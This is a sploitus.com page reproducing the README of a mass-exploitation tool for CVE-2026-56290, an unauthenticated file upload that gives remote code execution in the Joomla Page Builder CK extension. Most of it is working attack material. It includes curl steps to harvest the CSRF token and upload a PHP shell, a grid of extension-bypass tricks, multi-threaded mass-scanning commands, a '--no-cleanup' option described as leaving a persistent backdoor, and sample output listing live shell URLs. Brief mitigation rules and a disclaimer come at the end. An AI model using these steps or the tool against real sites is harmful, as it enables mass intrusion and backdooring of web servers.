Share
## https://sploitus.com/exploit?id=016F4AA9-EE0B-5CBF-994B-B5E79CF929C3
Mass Exploitation & Validation Framework for Joomla Page Builder CK
Unauthenticated Arbitrary File Upload โ†’ Remote Code Execution



---

## ๐Ÿ“‘ Table of Contents

- [Vulnerability Overview](#-vulnerability-overview)
- [Affected Versions](#-affected-versions)
- [Features](#-features)
- [Installation](#-installation)
- [Usage](#-usage)
- [Proof of Concept](#-proof-of-concept)
- [Technical Deep-Dive](#-technical-deep-dive)
- [Detection Methodology](#-detection-methodology)
- [Defense & Mitigation](#-defense--mitigation)
- [Disclaimer](#-disclaimer)
- [References](#-references)

---

## ๐Ÿ”ด Vulnerability Overview

**CVE-2026-56290** is a critical-severity vulnerability in **Page Builder CK** (`com_pagebuilderck`), a popular Joomla page builder extension. The `browse.ajaxAddPicture` controller method accepts unauthenticated file uploads with a **user-controlled destination path**, allowing attackers to write arbitrary PHP files to web-accessible directories.

### The Root Cause

```php
// browse.php controller โ€” NO authentication check
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // โ† user-controlled file
    $path  = trim($input->get('path', ''));       // โ† user-controlled path, only trim()!
    // ... uploads file to $path without validating the destination
}
```

The `path` parameter undergoes **only `trim()` sanitization** โ€” no whitelist, no directory traversal check, no authentication gate. Combined with a CSRF token that is publicly accessible from any Joomla page, attackers can remotely upload PHP shells to any writable directory.

### Impact

| Vector | Severity | Impact |
|--------|----------|--------|
| Unauthenticated File Upload | **9.8 (Critical)** | Arbitrary PHP code execution |
| CSRF Token Harvesting | **5.3 (Medium)** | Enables the upload chain |
| Information Disclosure | **5.3 (Medium)** | Extension version fingerprinting |

### The Attack Chain

```
1. HIT Joomla homepage     โ†’  harvest CSRF token (hex32 + value "1")
2. POST file upload         โ†’  task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in       โ†’  media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL            โ†’  code executes, RCE confirmed
5. POST f=@file to shell    โ†’  upload additional tools
6. GET ?cleanup=1           โ†’  shell self-destructs
```

---

## ๐ŸŸ  Affected Versions

| Page Builder CK Version | Status | Notes |
|:---|:---:|:---|
| **3.1.1 and below** | ๐Ÿ”ด **Vulnerable** | Confirmed unauthenticated upload |
| **3.4.10 and below** | ๐Ÿ”ด **Vulnerable** | Extended range per analysis |
| **3.5.10 and below** | ๐Ÿ”ด **Vulnerable** | Some patched variants may exist |
| > 3.5.10 | ๐ŸŸข Possibly Patched | Verify via manifest XML |

> **Note:** Version is detected from the Joomla manifest file at `/administrator/manifests/files/com_pagebuilderck.xml`. If the manifest is inaccessible, the scanner defaults to treating the target as potentially vulnerable.

---

## โœจ Features





### ๐Ÿ” Reconnaissance
- **Joomla detection** โ€” 2-phase: HTML fingerprints + admin panel probe
- **PBCK detection** โ€” Direct path probes + HTML pattern matching
- **Version extraction** โ€” Manifest XML parsing + HTML regex fallback
- **CSRF token harvesting** โ€” Multi-page token extraction (home, login, registration, admin)
- **Endpoint brute-forcing** โ€” 1000+ task/param/path combos with time-budgeted discovery




### ๐Ÿ’€ Exploitation
- **40+ extension bypass** โ€” Case juggling, numbered variants, double extensions, Windows tricks
- **20+ destination paths** โ€” Extension dirs, Joomla writable dirs, traversal paths
- **Shell validation** โ€” Token-based confirmation that PHP executes
- **Auto-cleanup** โ€” Shells self-destruct after validation (`?cleanup=1`)
- **Live TXT output** โ€” Real-time thread-safe results written to file
- **JSON report** โ€” Structured report with full per-target details





---

## ๐Ÿ“ฆ Installation

```bash
# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Install dependencies
pip install -r requirements.txt

# Verify
python cve_2026_56290.py --help
```

### Requirements

```txt
requests>=2.28.0
urllib3>=1.26.0
```

---

## ๐Ÿ“– Usage

### Command Line Arguments

```
CVE-2026-56290 โ€” PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator

  -t, --target        Single target URL
  -f, --file          File with target URLs (one per line, # for comments)
  -o, --output        Live TXT output file (default: cve-2026-56290_live.txt)
  --json              JSON report file path (default: cve-2026-56290_report.json)
  --threads           Concurrent workers (default: 20)
  --timeout           Request timeout in seconds (default: 15)
  --no-cleanup        Leave shells on target (persistent backdoor)
  -v, --verbose       Verbose endpoint discovery output
  --known-endpoint    Skip discovery: task,file_param,folder_param
```

### Basic Usage

```bash
# Single target
python cve_2026_56290.py -t https://target.com

# Mass scan from file
python cve_2026_56290.py -f targets.txt

# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"
```

### Target File Format

```
# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored
```

---

## ๐Ÿงช Proof of Concept

### Scenario 1: Mass Scan with Live Output

```bash
$ python cve_2026_56290.py -f targets.txt -o live_results.txt
```

```
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
  Live TXT: live_results.txt
  2026-07-04 15:30:00
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

  โœ… https://target-vuln.com  [rce_confirmed]  12.4s
     PBCK: 3.4.7 [VULN]
     RCE  : ext=php | path=media/com_pagebuilderck/gfonts/
     Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

  ๐Ÿ›ก๏ธ https://target-patched.com  [patched]  3.2s

  โœ… https://target-vuln2.com  [rce_confirmed]  15.1s
     PBCK: 3.1.0 [VULN]
     RCE  : ext=pHP | path=media/com_pagebuilderck/fonts/
     Shell: https://target-vuln2.com/media/com_pagebuilderck/fonts/pbck_x7k2m4v9.pHP
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

==================================================
  SCAN SUMMARY
==================================================
  Total           : 5
  โœ… RCE Confirmed : 2
  โš ๏ธ  RCE Failed    : 1
  ๐Ÿ›ก๏ธ  Patched       : 1
  ๐Ÿ” Need Diff     : 0
  โŒ Not Joomla    : 0
  โญ๏ธ  No Component  : 1
  ๐Ÿ’ฅ Errors         : 0
==================================================
```

---

### Scenario 2: Manual Reproduction (curl + Python)

**Step 1 โ€” Harvest CSRF Token**

```bash
curl -sk 'https://target.com/' | grep -oP 'name="[a-f0-9]{32}" value="1"'
# name="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6" value="1"
```

**Step 2 โ€” Upload PHP Shell**

```bash
TOKEN="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"

curl -sk \
  -F "file=@shell.php;type=application/x-php" \
  -F "path=media/com_pagebuilderck/gfonts/" \
  "https://target.com/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&${TOKEN}=1"
```

**Step 3 โ€” Verify RCE**

```bash
curl -sk 'https://target.com/media/com_pagebuilderck/gfonts/shell.php'
# โ†’ PHP shell output, confirms code execution
```

---

### Scenario 3: The PHP Shell Payload

The scanner deploys a **self-contained uploader shell** โ€” no `exec()`, `system()`, or `eval()` required:

```php


  
  

';
?>
```

**Shell capabilities:**
- ๐Ÿ“ค Upload additional files via POST `f=@file`
- ๐Ÿงน Self-destruct via `?cleanup=1`
- ๐Ÿ”‘ Token-based validation (scanner verifies the unique token in output)

---

## ๐Ÿ”ฌ Technical Deep-Dive

### Architecture

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                     PBCK-EXPLOIT                        โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚   RECON PHASE   โ”‚           EXPLOIT PHASE               โ”‚
โ”‚                  โ”‚                                      โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚
โ”‚  โ”‚ Joomla     โ”‚  โ”‚  โ”‚ Endpoint     โ”‚  โ”‚ Extension    โ”‚  โ”‚
โ”‚  โ”‚ Detection  โ”‚  โ”‚  โ”‚ Brute-force  โ”‚  โ”‚ Bypass Grid  โ”‚  โ”‚
โ”‚  โ”‚ (2-phase)  โ”‚  โ”‚  โ”‚ (1000+ combo)โ”‚  โ”‚ (40+ exts)   โ”‚  โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚
โ”‚        โ”‚         โ”‚         โ”‚                  โ”‚          โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚
โ”‚  โ”‚ PBCK       โ”‚  โ”‚  โ”‚ CSRF Token   โ”‚  โ”‚ PHP Shell    โ”‚  โ”‚
โ”‚  โ”‚ Detection  โ”‚  โ”‚  โ”‚ Harvester    โ”‚  โ”‚ Deployment   โ”‚  โ”‚
โ”‚  โ”‚ (probes)   โ”‚  โ”‚  โ”‚ (5 pages)    โ”‚  โ”‚ (20+ paths)  โ”‚  โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚
โ”‚        โ”‚         โ”‚         โ”‚                  โ”‚          โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚         โ”‚           โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚
โ”‚  โ”‚ Version    โ”‚  โ”‚         โ”‚           โ”‚ Validation   โ”‚  โ”‚
โ”‚  โ”‚ Check      โ”‚  โ”‚         โ”‚           โ”‚ + Cleanup    โ”‚  โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚         โ”‚           โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

### Endpoint Discovery Strategy

The scanner uses a **tiered brute-force** approach with a per-target time budget (15s):

| Tier | Tasks | File Params | Folder Params | Dest Paths | Total Combos |
|:---|:---|:---|:---|:---|:---|
| **Tier 1** (confirmed) | `browse.ajaxAddPicture` + 3 others | `file`, `Filedata` | `path`, `folder`, `dir` | Top 4 PBCK dirs | 96 |
| **Tier 2** (full grid) | 12 tasks | 4 params | 5 params | 20+ paths | 4,800+ |

Each combo: upload a `.txt` probe โ†’ verify via GET โ†’ match on success. Returns immediately when confirmed.

### Extension Bypass Philosophy

CKFile::makeSafe() blocks `.php` on some configurations. The bypass strategy:

```
Tier 1: Fast
  php, PHP, pht, phar
         โ†“ (if blocked)
Tier 2: Case juggling
  Php, pHp, PhP, pHt, PHT, PhTmL, pHtml, ...
         โ†“ (if blocked)
Tier 3: Alternative handlers
  php3, php4, php5, php6, php7, php8, phtml, shtml, inc
         โ†“ (if blocked)
Tier 4: Double extensions
  php.jpg, jpg.php, php.png, php.gif, php.txt
         โ†“ (if blocked)
Tier 5: Windows tricks
  php., PHP., php. , php.SWF
```

### CSRF Token Harvesting

Joomla's CSRF token is embedded in **every page** โ€” home, login, registration, contact forms, admin:

```python
CSRF_PAGES = [
    "",                                                            # homepage
    "/index.php?option=com_users&view=login",                       # login
    "/index.php?option=com_users&view=registration",                # registration
    "/index.php?option=com_contact&view=contact&id=1",              # contact
    "/administrator/index.php",                                     # admin login
]
```

Pattern A โ€” HTML hidden input: `" value="1">`

Pattern B โ€” JSON config: `"csrf.token":""`

---

## ๐Ÿ” Detection Methodology

### Joomla Detection (2-Phase)

**Phase 1 โ€” HTML Fingerprints (fast, definitive)**
- Generator meta tag containing "Joomla!"
- Structural elements: ``, `joomla-script-options`, `"csrf.token"`
- Path patterns: `/components/com_`, `/modules/mod_`, `/plugins/system/`
- Session cookie analysis

**Phase 2 โ€” Admin Panel Probe (fallback)**
- Fetches `/administrator/` page
- Checks for Joomla-specific admin markers: `name="username"`, `mod-login-`, `administrator/templates/`

### PBCK Detection (3-Tier)

**Tier 1 โ€” HTML strong indicators**
```
com_pagebuilderck, /pagebuilderck/, /media/com_pagebuilderck
```

**Tier 2 โ€” HTML weak indicators with confirmation**
```
pagebuilderck + (pbck_ | pagebuilderck.css | pagebuilderck.js)
```

**Tier 3 โ€” Direct file probes** (catches installs where PBCK isn't on homepage)
```
/media/com_pagebuilderck/css/pagebuilderck.css
/media/com_pagebuilderck/js/pagebuilderck.js
/administrator/manifests/files/com_pagebuilderck.xml
```

---

## ๐Ÿ›ก๏ธ Defense & Mitigation

### 1. Upgrade Immediately
```bash
# Update Page Builder CK to the latest patched version
# Check: https://extensions.joomla.org/extension/page-builder-ck/
```

### 2. Block the Upload Endpoint
```nginx
# Nginx โ€” block unauthenticated access to the upload controller
location ~* "option=com_pagebuilderck&task=browse.ajaxAddPicture" {
    deny all;
}
```

```apache
# Apache/.htaccess
RewriteCond %{QUERY_STRING} task=browse\.ajaxAddPicture [NC]
RewriteRule ^ - [F]
```

### 3. Harden PHP Execution in Writable Directories
```apache
# .htaccess in media/ โ€” disable PHP execution

    Require all denied

```

### 4. Audit Your Fleet
```bash
# Scan your own infrastructure
python cve_2026_56290.py -f my_joomla_sites.txt -o audit_results.txt
```

---

## โš ๏ธ Disclaimer

> ### ๐Ÿšจ FOR EDUCATIONAL & AUTHORIZED TESTING PURPOSES ONLY
>
> This software is provided **solely for educational purposes** and **legitimate security research**. It is intended to be used by:
>
> - ๐Ÿ›ก๏ธ **Security professionals** conducting authorized penetration tests
> - ๐Ÿข **Organizations** auditing their own Joomla infrastructure
> - ๐Ÿ”ฌ **Researchers** studying vulnerability exploitation techniques
> - ๐ŸŽ“ **Students** learning about web application security
>
> ### โŒ You may NOT use this software to:
>
> - Access computer systems **without explicit written authorization**
> - Compromise, damage, or disrupt systems you do not **own**
> - Engage in **illegal activity** of any kind
>
> ### โš–๏ธ Legal Notice
>
> Unauthorized access to computer systems violates laws including but not limited to:
> - **United States:** Computer Fraud and Abuse Act (18 U.S.C. ยง 1030)
> - **Indonesia:** UU ITE Pasal 30 & 46 (UU No. 11 Tahun 2008 jo. UU No. 1 Tahun 2024)
> - **European Union:** Directive 2013/40/EU
> - **United Kingdom:** Computer Misuse Act 1990
>
> **The author(s) assume NO LIABILITY for any misuse, damage, or legal consequences resulting from the use of this tool. By using this software, you acknowledge that you are solely responsible for your actions and agree to comply with all applicable laws.**

---

## ๐Ÿ“š References

| Resource | Link |
|:---|:---|
| NVD Entry | [CVE-2026-56290](https://nvd.nist.gov/vuln/detail/CVE-2026-56290) |
| Joomla Security | [developer.joomla.org/security](https://developer.joomla.org/security.html) |
| Page Builder CK | [extensions.joomla.org](https://extensions.joomla.org/extension/page-builder-ck/) |
| OWASP File Upload | [Unrestricted File Upload](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload) |

---


  โšก Built with precision for the security research community โšก
  
  Joomlaยฎ is a registered trademark of Open Source Matters, Inc.
  
  This project is not affiliated with or endorsed by Joomla, Open Source Matters, or Page Builder CK.